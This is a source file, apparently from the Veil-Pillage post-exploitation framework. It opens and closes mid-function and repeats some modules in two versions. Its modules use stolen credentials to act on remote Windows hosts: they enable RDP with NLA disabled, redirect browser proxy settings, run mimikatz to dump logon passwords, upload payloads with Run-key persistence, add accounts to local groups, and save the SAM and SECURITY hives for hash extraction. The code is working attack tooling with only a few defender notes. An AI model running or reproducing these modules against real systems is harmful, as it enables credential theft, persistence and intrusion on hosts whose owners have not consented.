            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
    def run(self):
        """Enable Remote Desktop on every target through remote reg.exe / netsh.

        Uses the first credential pair in self.creds and the configured
        trigger_method. Per target, three remote commands run in order:
        fDenyTSConnections=0 (enable RDP), UserAuthentication=0 (disable NLA on
        RDP-Tcp), then a legacy ``netsh firewall`` exception for remotedesktop.
        Each later step runs only if the previous one reported success. Every
        outcome is appended to self.output; on RDP success a cleanup line
        restoring fDenyTSConnections=1 is appended to self.cleanup.

        NOTE(review): only the RDP change is recorded in self.cleanup. The NLA
        change and the firewall exception are never reverted, so a run leaves
        the host with NLA off and an extra firewall rule after cleanup.
        NOTE(review): the password is written into self.output in plaintext.
        Defender note: the host-side artefacts are the two Terminal Server
        registry values below and the new firewall service exception.
        """

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # enable RDP command
        rdpCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

        # cleanup RDP command (the only change that is ever reverted)
        rdpCleanupCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'

        # Disable NLA command - no matching re-enable command exists in this module
        nlaCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'

        # Firewall exception command (legacy netsh context; its success text is
        # "executed successfully", unlike the reg.exe steps)
        firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"

        for target in self.targets:

            # execute the RDP enable command and get the result
            rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)

            if rdpResult == "":
                # empty string means the result file never came back
                self.output += (
                    "[!] No result file, RDP enable failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
            elif "The operation completed successfully" in rdpResult:

                self.output += (
                    "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
                # our cleanup is to execute the RDP disable command
                # (pipe-delimited record; presumably parsed by the framework's
                # cleanup runner - confirm the field order there)
                self.cleanup += (
                    "executeCommand|"
                    + target
                    + "|"
                    + username
                    + "|"
                    + password
                    + "|"
                    + rdpCleanupCMD
                    + "|"
                    + triggerMethod
                    + "\n"
                )

                # if we succeed here, keep going...

                # execute the disable NLA command
                nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod)
                if nlaResult == "":
                    self.output += (
                        "[!] No result file, NLA disable failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )
                elif "The operation completed successfully" in nlaResult:
                    self.output += (
                        "[*] NLA successfully disabled using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )

                    # more success, keep going again...

                    # execute the firewall exception command
                    firewallResult = command_methods.executeResult(
                        target, username, password, firewallCMD, triggerMethod
                    )

                    if firewallResult == "":
                        # NOTE(review): "exeception" below is a typo in a runtime
                        # string; left as-is here because it is program output
                        self.output += (
                            "[!] No result file, firewall exeception failed using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )
                    elif "executed successfully" in firewallResult:
                        self.output += (
                            "[*] Firewall exception successfully enabled using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )
                    else:
                        self.output += (
                            "[!] Error in enabling firewall exception using creds '"
                            + username
                            + ":"
                            + password
                            + "' on : "
                            + target
                            + "\n"
                        )

                else:
                    self.output += (
                        "[!] Error in disabling NLA using creds '"
                        + username
                        + ":"
                        + password
                        + "' on : "
                        + target
                        + "\n"
                    )

            else:
                self.output += (
                    "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
    def run(self):
        """Point each target's WinINET proxy at proxy_url via remote reg.exe.

        Uses the first credential pair and the configured trigger_method.
        For every target, ProxyEnable is queried under HKCU and one of three
        paths is taken: value absent -> enable, then set the server; 0x0 ->
        record the current ProxyServer, enable, then set; 0x1 -> record the
        current ProxyServer and set. Only when the final 'set' reports success
        is a cleanup line restoring the recorded state appended to self.cleanup.

        NOTE(review): the HKCU hive written here belongs to whichever account
        the remote command runs as (depends on triggerMethod), which is not
        necessarily the interactive user's hive - confirm before relying on it.
        NOTE(review): if 'enable' succeeds but 'set' fails, ProxyEnable has
        already been changed and no cleanup entry is recorded; neither failure
        produces an output line (there are no else branches for them).
        NOTE(review): in the 0x1 path an empty `proxy` makes the cleanup write
        an empty ProxyServer string instead of deleting the value.
        NOTE(review): the password is concatenated into self.output in plaintext.
        """

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options['trigger_method'][0]
        proxyUrl = self.required_options['proxy_url'][0]

        proxyCheckCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable"

        proxyCheckServerCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer"

        proxyEnableCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 1 /f"

        # proxyUrl is interpolated unquoted into the command line
        proxySetCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d %s /f" % (
            proxyUrl)
        # previously configured ProxyServer value, re-read per target below
        proxy = ""

        for target in self.targets:

            self.output += "[*] Checking proxy settings on %s" % (target)

            results = command_methods.executeResult(target, username, password,
                                                    proxyCheckCmd,
                                                    triggerMethod)

            if results == "":
                # empty string means the result file never came back
                self.output += "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "ProxyEnable" not in results:
                # value absent from the query output: nothing to preserve
                self.output += "\n[*] Proxy has never been set on " + target

                self.output += "\n[*] Enabling system proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod)

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(
                        target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                            proxyUrl, target)

                        # cleanup deletes both values, since neither existed before
                        cleanupCMD = "reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /f && reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /f"
                        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            elif "0x0" in results:
                # substring test on the whole query output - presumably the
                # REG_DWORD value of ProxyEnable; confirm nothing else can match
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd,
                    triggerMethod)
                proxy = ""

                # last host:port-looking token wins
                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy has been disabled on %s" % (
                        target)
                else:
                    self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (
                        proxy, target)

                self.output += "\n[*] Enabling proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod)

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(
                        target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                            proxyUrl, target)

                        # cleanup restores ProxyEnable=0 and the recorded ProxyServer
                        cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            elif "0x1" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd,
                    triggerMethod)
                proxy = ""

                # last host:port-looking token wins
                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy already enabled on %s" % (
                        target)
                else:
                    self.output += "\n[*] Proxy already enabled and set to %s on %s" % (
                        proxy, target)

                self.output += "\n[*] Setting proxy server on " + target

                # proxy is already enabled, so only the server value is changed
                set_results = command_methods.executeResult(
                    target, username, password, proxySetCmd, triggerMethod)

                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (
                        proxyUrl, target)

                    # cleanup restores the recorded ProxyServer ("" if none was found)
                    cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                    self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            else:
                self.output += "\n[!] Got unexpected output: %s" % results
    def run(self):
        """Point each target's WinINET proxy at proxy_url via remote reg.exe.

        Uses the first credential pair and the configured trigger_method.
        For every target, ProxyEnable is queried under HKCU and one of three
        paths is taken: value absent -> enable, then set the server; 0x0 ->
        record the current ProxyServer, enable, then set; 0x1 -> record the
        current ProxyServer and set. Only when the final 'set' reports success
        is a cleanup line restoring the recorded state appended to self.cleanup.

        NOTE(review): the HKCU hive written here belongs to whichever account
        the remote command runs as (depends on triggerMethod), which is not
        necessarily the interactive user's hive - confirm before relying on it.
        NOTE(review): if 'enable' succeeds but 'set' fails, ProxyEnable has
        already been changed and no cleanup entry is recorded; neither failure
        produces an output line (there are no else branches for them).
        NOTE(review): in the 0x1 path an empty `proxy` makes the cleanup write
        an empty ProxyServer string instead of deleting the value.
        NOTE(review): the password is concatenated into self.output in plaintext.
        """

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        proxyUrl = self.required_options["proxy_url"][0]

        proxyCheckCmd = (
            'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable'
        )

        proxyCheckServerCmd = (
            'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer'
        )

        proxyEnableCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f'

        # proxyUrl is interpolated unquoted into the command line
        proxySetCmd = (
            'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d %s /f'
            % (proxyUrl)
        )
        # previously configured ProxyServer value, re-read per target below
        proxy = ""

        for target in self.targets:

            self.output += "[*] Checking proxy settings on %s" % (target)

            results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod)

            if results == "":
                # empty string means the result file never came back
                self.output += (
                    "\n[!] No result file, Proxy enable failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on : "
                    + target
                    + "\n"
                )
            elif "ProxyEnable" not in results:
                # value absent from the query output: nothing to preserve
                self.output += "\n[*] Proxy has never been set on " + target

                self.output += "\n[*] Enabling system proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod
                )

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                        # cleanup deletes both values, since neither existed before
                        cleanupCMD = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /f && reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /f'
                        self.cleanup += (
                            "executeCommand|"
                            + target
                            + "|"
                            + username
                            + "|"
                            + password
                            + "|"
                            + cleanupCMD
                            + "|"
                            + triggerMethod
                            + "\n"
                        )

            elif "0x0" in results:
                # substring test on the whole query output - presumably the
                # REG_DWORD value of ProxyEnable; confirm nothing else can match
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd, triggerMethod
                )
                proxy = ""

                # last host:port-looking token wins
                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy has been disabled on %s" % (target)
                else:
                    self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target)

                self.output += "\n[*] Enabling proxy"

                enable_results = command_methods.executeResult(
                    target, username, password, proxyEnableCmd, triggerMethod
                )

                if "The operation completed successfully" in enable_results:
                    self.output += "\n[*] Proxy successfully enabled on " + target

                    self.output += "\n[*] Setting proxy server"

                    set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                    if "The operation completed successfully" in set_results:
                        self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                        # cleanup restores ProxyEnable=0 and the recorded ProxyServer
                        cleanupCMD = (
                            'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
                            % proxy
                        )
                        self.cleanup += (
                            "executeCommand|"
                            + target
                            + "|"
                            + username
                            + "|"
                            + password
                            + "|"
                            + cleanupCMD
                            + "|"
                            + triggerMethod
                            + "\n"
                        )

            elif "0x1" in results:
                server_results = command_methods.executeResult(
                    target, username, password, proxyCheckServerCmd, triggerMethod
                )
                proxy = ""

                # last host:port-looking token wins
                for res in server_results.split(" "):
                    r = re.findall(r".+:[0-9]{1,5}", res)
                    if r:
                        proxy = r[0]

                if proxy == "":
                    self.output += "\n[*] Proxy already enabled on %s" % (target)
                else:
                    self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target)

                self.output += "\n[*] Setting proxy server on " + target

                # proxy is already enabled, so only the server value is changed
                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)

                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)

                    # cleanup restores the recorded ProxyServer ("" if none was found)
                    cleanupCMD = (
                        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f'
                        % proxy
                    )
                    self.cleanup += (
                        "executeCommand|"
                        + target
                        + "|"
                        + username
                        + "|"
                        + password
                        + "|"
                        + cleanupCMD
                        + "|"
                        + triggerMethod
                        + "\n"
                    )

            else:
                self.output += "\n[!] Got unexpected output: %s" % results
    def run(self):
        """Run the bundled mimikatz binary on each target and collect its output.

        Uses the first credential pair plus trigger_method, lhost, delay and
        out_file from required_options. Per target: read
        %PROCESSOR_ARCHITECTURE% to pick the x86 or x64 binary under
        settings.VEIL_PILLAGE_PATH, host it from lhost and trigger it with the
        sekurlsa::logonPasswords arguments redirected to out_file, sleep
        `delay` seconds, then fetch and delete out_file over SMB. Parsed
        credentials are accumulated across targets and, at the end,
        de-duplicated, sorted and appended to self.output per provider.

        NOTE(review): delay is a string; int(delay) runs only after the binary
        has been triggered, so a non-numeric option value raises ValueError
        with the remote process already started and out_file left behind.
        NOTE(review): the "error" check on archResult is case-sensitive and
        only guards this first command; later failures surface as an empty
        `out`.
        NOTE(review): the password is concatenated into self.output in plaintext.
        Defender note: the host-side artefacts are the hosted binary executed
        via the trigger method and out_file in the Windows temp directory;
        LSA protection / Credential Guard are the usual mitigations for this
        class of credential access.
        """

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # the temporary output file mimikatz will write to
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # let's keep track of ALL plaintext credentials found
        allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []

        for target in self.targets:

            print "\n [*] Executing mimikatz on " + target
            # first, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username,
                                                       password, archCommand,
                                                       triggerMethod)

            # if there's a failure in this initial execution, go to the next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
                continue

            # anything containing "64" (e.g. AMD64) selects the x64 build
            arch = "x86"
            if "64" in archResult: arch = "x64"

            # stdout of the remote process is redirected into out_file
            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # now time for mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

            # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
            delivery_methods.hostTrigger(target,
                                         username,
                                         password,
                                         mimikatzPath,
                                         lhost,
                                         triggerMethod=triggerMethod,
                                         exeArgs=exeArgs)

            # fixed wait; there is no polling for the output file
            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target,
                              username,
                              password,
                              out_file,
                              delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location (even when out is empty)
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                              out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        # append the total mimikatz creds if we have any
        # (sorted(set(...)) de-duplicates across targets)
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
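    def run(self):
        """Upload a payload binary to C:\\Windows\\ on each target and point a
        value under HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run at it.

        The binary comes from Veil-Evasion when ``exe_path`` is "veil"
        (interactive main menu unless ``args.p`` names a payload), otherwise
        ``exe_path`` is used as given.  ``upload_name`` (".exe" appended when
        missing) is the remote file name and ``key_name`` the Run value name.
        Only the first credential pair is used.

        Returns "" when payload generation produced nothing or the binary path
        does not exist, else None.  Per-target results are appended to
        ``self.output``; on success a cleanup line deleting the Run value is
        appended to ``self.cleanup``.  That cleanup removes only the registry
        value: the uploaded binary in C:\\Windows\\ and the staged copy under
        /tmp are left in place by this module.
        """
        # function-scope import: the module's import block is outside this snippet
        import shutil

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]
        key_name = self.required_options["key_name"][0]

        if self.required_options["exe_path"][0].lower() == "veil":
            payloadPath = self._generateVeilPayload()

            # sanity check if the user exited Veil-Evasion without generating anything
            if not payloadPath:
                print(helpers.color(" [!] No output from Veil-Evasion", warning=True))
                raw_input("\n [>] Press enter to continue: ")
                return ""
        else:
            payloadPath = self.required_options["exe_path"][0]

        # checked for both branches: a path reported by Veil-Evasion is not
        # guaranteed to exist either, and shutil.copy would raise on it
        if not os.path.exists(payloadPath):
            print(helpers.color("\n\n [!] Invalid .exe path specified", warning=True))
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # stage a copy under /tmp with the upload name.  shutil.copy replaces
        # a "cp" run through os.system, which broke on spaces in either path
        # and handed shell metacharacters from the options to /bin/sh.
        localPath = "/tmp/" + uploadName
        shutil.copy(payloadPath, localPath)

        # loop-invariant: the source binary's base name as shown in the log
        baseName = payloadPath.split("/")[-1]

        for target in self.targets:

            # upload the payload to C:\Windows\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\", localPath)
            self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

            # registry command that points the Run value at the uploaded binary
            regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""

            regResult = command_methods.executeResult(
                target, username, password, regCommand, triggerMethod)

            if regResult == "":
                self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in regResult:
                self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
            else:
                # previously this outcome was dropped silently; keep the
                # tool's own output so the operator sees what reg.exe said
                self.output += "[!] CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + " : " + regResult.strip() + "\n"

    def _generateVeilPayload(self):
        """Drive Veil-Evasion to produce a payload .exe and return the path it
        reports (may be empty/None if the user backed out of the menu).

        Without ``args.p`` the interactive main menu is shown.  With it, each
        ``args.c`` entry of the form name=value becomes a required option and
        ``args.msfpayload``/``args.msfoptions`` are passed through, then the
        payload is generated non-interactively.  The banner and module name
        are re-printed afterwards because Veil-Evasion overwrites them.
        """
        con = controller.Controller()

        if not self.args.p:
            payloadPath = con.MainMenu()
        else:
            options = {}
            if self.args.c:
                options['required_options'] = {}
                for option in self.args.c:
                    # split on the first "=" only, so a value may itself contain "="
                    name, value = option.split("=", 1)
                    options['required_options'][name] = [value, ""]

            if self.args.msfpayload:
                options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

            con.SetPayload(self.args.p, options)
            code = con.GeneratePayload()
            payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)

        messages.title()
        print(" [*] Executing module: " + helpers.color(self.name) + "...")
        return payloadPath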
    def run(self):
        """Add the ``user`` option to the ``localgroup`` option on every
        target with ``net localgroup <group> <user> /add``.

        Only the first credential pair is used.  Each outcome (no result
        file, success, other failure) is appended to ``self.output``; on
        success a matching ``/delete`` command is recorded in ``self.cleanup``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            account = self.required_options["user"][0]
            group = self.required_options["localgroup"][0]

            addCommand = "net localgroup %s %s /add" % (group, account)
            result = command_methods.executeResult(
                target, username, password, addCommand, triggerMethod)

            if result == "":
                self.output += (
                    "[!] No result file, localgroup add '%s to %s' failed using creds '%s:%s' on : %s\n"
                    % (account, group, username, password, target)
                )
            elif "The command completed successfully" in result:
                self.output += (
                    "[*] User '%s added to %s' successfully using creds '%s:%s' on %s\n"
                    % (account, group, username, password, target)
                )
                # cleanup -> remove the account from the group again
                removeCommand = "net localgroup %s %s /delete" % (group, account)
                self.cleanup += "executeCommand|%s|%s|%s|%s|%s\n" % (
                    target, username, password, removeCommand, triggerMethod)
            else:
                self.output += (
                    "[!] Localgroup add '%s to %s' failed using creds '%s:%s' on : %s\n"
                    % (account, group, username, password, target)
                )
    def run(self):
        """Run the bundled mimikatz binary on every target and collect the
        credentials it reports.

        Per target: the architecture is probed with
        ``echo %PROCESSOR_ARCHITECTURE%`` (an "error" in that output skips
        the host), the matching mimikatz<arch>.exe from the data directory is
        hosted from ``lhost`` and triggered with
        ``sekurlsa::logonPasswords full`` redirected into ``out_file`` (a
        bare name is placed under C:\\Windows\\Temp\\).  After ``delay``
        seconds the file is fetched and deleted over SMB, saved with
        helpers.saveModuleFile and parsed.  Entries from all targets are
        de-duplicated per provider at the end of ``self.output``.
        Only the first credential pair is used.
        """
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # a bare name goes under C:\Windows\Temp; anything containing a
        # backslash is treated as an already-absolute remote path
        if "\\" not in out_file:
            out_file = "C:\\Windows\\Temp\\" + out_file

        # mimikatz arguments are identical for every target
        exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

        # credentials seen across all targets, keyed by mimikatz provider
        providers = ("msv1_0", "kerberos", "wdigest", "tspkg")
        found = dict((name, []) for name in providers)

        credTag = "using creds '%s:%s' on " % (username, password)

        for target in self.targets:

            print("\n [*] Executing mimikatz on " + target)

            archResult = command_methods.executeResult(
                target, username, password, "echo %PROCESSOR_ARCHITECTURE%", triggerMethod)

            # a failed probe means nothing else will run either; next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for %s : %s\n" % (target, archResult)
                continue

            arch = "x64" if "64" in archResult else "x86"
            mimikatzPath = "%s/data/misc/mimikatz%s.exe" % (settings.VEIL_PILLAGE_PATH, arch)

            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost,
                                         triggerMethod=triggerMethod, exeArgs=exeArgs)

            print("\n [*] Waiting %ss for Mimikatz to run..." % delay)
            time.sleep(int(delay))

            out = smb.getFile(target, username, password, out_file, delete=True)

            for name, entries in zip(providers, helpers.parseMimikatz(out)):
                found[name].extend(entries)

            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

            if out != "":
                self.output += "[*] Mimikatz results %s%s stored at %s\n" % (credTag, target, saveFile)
            else:
                self.output += "[!] Mimikatz failed %s%s : no result file\n" % (credTag, target)

        # totals across targets, de-duplicated and sorted per provider
        for name in providers:
            if found[name]:
                self.output += "[*] All %s:\n\t%s\n" % (name, "\n\t".join(sorted(set(found[name]))))
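    def run(self):
        """Collect credentials from every target, via autograb.ps1
        (Invoke-Mimikatz plus powerdump) when PowerShell is usable, otherwise
        via ``reg save`` of the SYSTEM/SECURITY/SAM hives plus a hosted
        mimikatz binary.

        Options read: lhost, use_ssl, force_method ("binary" or "powershell"
        skip the probe; anything else auto-detects), delay (seconds to wait
        for the remote job) and out_file (a bare name is placed under
        C:\\Windows\\Temp\\).  Only the first credential pair is used.

        Per-target results are appended to ``self.output``; unique hashes and
        mimikatz credentials across all targets are summarised at the end.

        Artifacts: in the reg.exe path the hive copies under
        C:\\Windows\\Temp\\ are fetched with delete=False and no cleanup entry
        is recorded for them.  What the hosting/trigger helpers leave behind
        is not visible from this module.
        """
        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # a bare name goes under C:\Windows\Temp; anything containing a
        # backslash is treated as an absolute remote path.  Done once here
        # instead of once per target and branch.
        if "\\" not in out_file:
            out_file = "C:\\Windows\\Temp\\" + out_file

        # everything found across ALL targets, keyed by source
        found = {"hashes": [], "msv1_0": [], "kerberos": [], "wdigest": [], "tspkg": []}

        for target in self.targets:
            if self._powershellUsable(target, username, password, force_method):
                self._grabWithPowershell(target, username, password, lhost,
                                         use_ssl, delay, out_file, found)
            else:
                self._grabWithRegAndMimikatz(target, username, password, lhost,
                                             delay, out_file, found)

        self._appendCredentialSummary(found)

    def _powershellUsable(self, target, username, password, force_method):
        """Decide whether the PowerShell path is used on *target*.

        ``force_method`` "binary"/"powershell" answers without a probe;
        otherwise ``$a=42;$a`` is run through powershell.exe over wmis and
        "42" on stdout counts as a working install.
        """
        method = force_method.lower()
        if method == "binary":
            return False
        if method == "powershell":
            return True

        powershellCommand = "powershell.exe -c \"$a=42;$a\""
        powershellResult = command_methods.executeResult(
            target, username, password, powershellCommand, "wmis")
        return powershellResult.strip() == "42"

    def _collectMimikatz(self, out, found):
        """Parse mimikatz output and append each provider's entries to *found*."""
        msv1_0, kerberos, wdigest, tspkg = helpers.parseMimikatz(out)
        found["msv1_0"].extend(msv1_0)
        found["kerberos"].extend(kerberos)
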